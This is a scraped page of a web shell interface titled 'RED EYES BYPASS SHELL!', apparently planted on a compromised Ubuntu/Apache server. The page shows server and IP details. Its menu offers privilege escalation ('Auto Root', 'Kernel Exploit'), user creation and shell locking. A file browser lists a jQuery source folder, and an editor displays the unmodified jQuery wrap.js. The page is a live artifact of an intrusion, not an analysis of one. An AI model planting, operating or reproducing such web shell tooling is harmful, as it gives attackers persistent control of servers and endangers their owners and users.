Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
work_181165 /
plugin /
jquery /
src /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
ajax
[ DIR ]
drwxr-xr-x
attributes
[ DIR ]
drwxr-xr-x
core
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
data
[ DIR ]
drwxr-xr-x
deferred
[ DIR ]
drwxr-xr-x
deprecated
[ DIR ]
drwxr-xr-x
effects
[ DIR ]
drwxr-xr-x
event
[ DIR ]
drwxr-xr-x
exports
[ DIR ]
drwxr-xr-x
manipulation
[ DIR ]
drwxr-xr-x
queue
[ DIR ]
drwxr-xr-x
traversing
[ DIR ]
drwxr-xr-x
var
[ DIR ]
drwxr-xr-x
ajax.js
22.35
KB
-rwxr-xr-x
attributes.js
217
B
-rwxr-xr-x
callbacks.js
5.42
KB
-rwxr-xr-x
core.js
8.97
KB
-rwxr-xr-x
css.js
13.83
KB
-rwxr-xr-x
data.js
4.22
KB
-rwxr-xr-x
deferred.js
10.75
KB
-rwxr-xr-x
deprecated.js
2.17
KB
-rwxr-xr-x
dimensions.js
1.71
KB
-rwxr-xr-x
effects.js
17
KB
-rwxr-xr-x
event.js
23.85
KB
-rwxr-xr-x
jquery.js
646
B
-rwxr-xr-x
manipulation.js
12.03
KB
-rwxr-xr-x
offset.js
6.67
KB
-rwxr-xr-x
queue.js
3.02
KB
-rwxr-xr-x
selector-native.js
6.31
KB
-rwxr-xr-x
selector-sizzle.js
411
B
-rwxr-xr-x
selector.js
66
B
-rwxr-xr-x
serialize.js
3.16
KB
-rwxr-xr-x
traversing.js
4.58
KB
-rwxr-xr-x
wrap.js
1.44
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wrap.js
define( [ "./core", "./var/isFunction", "./core/init", "./manipulation", // clone "./traversing" // parent, contents ], function( jQuery, isFunction ) { "use strict"; jQuery.fn.extend( { wrapAll: function( html ) { var wrap; if ( this[ 0 ] ) { if ( isFunction( html ) ) { html = html.call( this[ 0 ] ); } // The elements to wrap the target around wrap = jQuery( html, this[ 0 ].ownerDocument ).eq( 0 ).clone( true ); if ( this[ 0 ].parentNode ) { wrap.insertBefore( this[ 0 ] ); } wrap.map( function() { var elem = this; while ( elem.firstElementChild ) { elem = elem.firstElementChild; } return elem; } ).append( this ); } return this; }, wrapInner: function( html ) { if ( isFunction( html ) ) { return this.each( function( i ) { jQuery( this ).wrapInner( html.call( this, i ) ); } ); } return this.each( function() { var self = jQuery( this ), contents = self.contents(); if ( contents.length ) { contents.wrapAll( html ); } else { self.append( html ); } } ); }, wrap: function( html ) { var htmlIsFunction = isFunction( html ); return this.each( function( i ) { jQuery( this ).wrapAll( htmlIsFunction ? html.call( this, i ) : html ); } ); }, unwrap: function( selector ) { this.parent( selector ).not( "body" ).each( function() { jQuery( this ).replaceWith( this.childNodes ); } ); return this; } } ); return jQuery; } );
Close